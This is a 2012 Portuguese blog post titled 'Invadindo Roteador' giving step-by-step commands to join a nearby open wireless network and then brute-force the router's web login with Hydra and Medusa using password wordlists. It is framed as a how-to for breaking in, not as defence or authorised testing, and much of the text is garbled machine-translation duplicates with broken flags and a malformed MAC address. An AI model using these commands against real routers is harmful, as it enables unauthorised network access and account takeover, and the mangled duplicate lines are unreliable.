sábado, 7 de julho de 2012

Invadindo Roteador

primeiro comando

airmon-ng

airmon-ng start wlan0 ng airmon-start wlan0

airodump-ng mon0 -t opn airodump-ng opn mon0-t



ficará assim:









o segundo comando:



ifconfig wlan0 down

iwconfig wlan0 essid default channel 1 iwconfig wlan0 essid um canal padrão

iwconfig ap 00:134:09:32:60 iwconfig ap 00:13: D4: 09:32:60

ifconfig wlan0 up ifconfig wlan0 up



preste atenção na imagem você ira entender!











Verificar a conexão

iwconfig wlan0 iwconfig wlan0









Obter um endereço IP e gateway de seleção

dhclient wlan0 dhclient wlan0

















Antes de mais nada verifique

os logins padroes do roteador









caso não encontre

você vai parar nessa pagina que esta na foto acima

-----------------------------------------------------------------------------



Então caso tenha tentado e não tenha conseguido vamos la...você ira precisar de uma word list eu uso o dicionario do broffice muito bom.

Começando Hydra para quebrar o login router / senha.

-L specifiying the path to login list -L especificando o caminho para login lista

-P specifying the path to password list -P especificando o caminho para a lista de senhas

-t limiting the number of connections T limitar o número de conexões

-e ns to check for no password and to check login as password ns-e para verificar se nenhuma senha e login para verificar como senha

-f to stop when first login/password is found -F para parar quando primeiro login / password é encontrado

-V to show each login/password attempt -V para mostrar cada login / tentativa de senha

http-get to specify the protocol to use http-get para especificar o protocolo a ser usado

/index.asp to point to the webpage it is heading to / Index.asp para apontar para a página que está indo para



hydra 192.168.1.1 -L /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -V http-get /index.asp hydra 192.168.1.1-L / wordlists / login.txt-P / wordlists / ap_password.txt-1 e t-ns-f-V http-get / index.asp

-----------------------------------------------------------------













---------------------------------------------------------------------

Para Medusa

-H para especificar o host

-U to specify path to the login wordlist -U para especificar o caminho para a wordlist login

-P to specify path to password wordlist -P para especificar caminho para wordlist senha

-t to limit the number of connections -T para limitar o número de conexões

-f to stop the test on finding a valid login/password -F para parar o teste em encontrar um login / password

-v for a more verbose output -V verbose para uma saída mais

-M to specify the module to use -M para especificar o módulo para usar

-m to specify the options for the module in use -M para especificar as opções para o módulo em uso



medusa -h 192.168.1.1 -U /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -v 5 -M http -m DIR:GET/index.asp medusa-h 192.168.1.1-U / wordlists / login.txt-P / wordlists / ap_password.txt-1 e t-ns-f-v 5-M m DIR-http: GET / index.asp


















Responder com Citação
← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86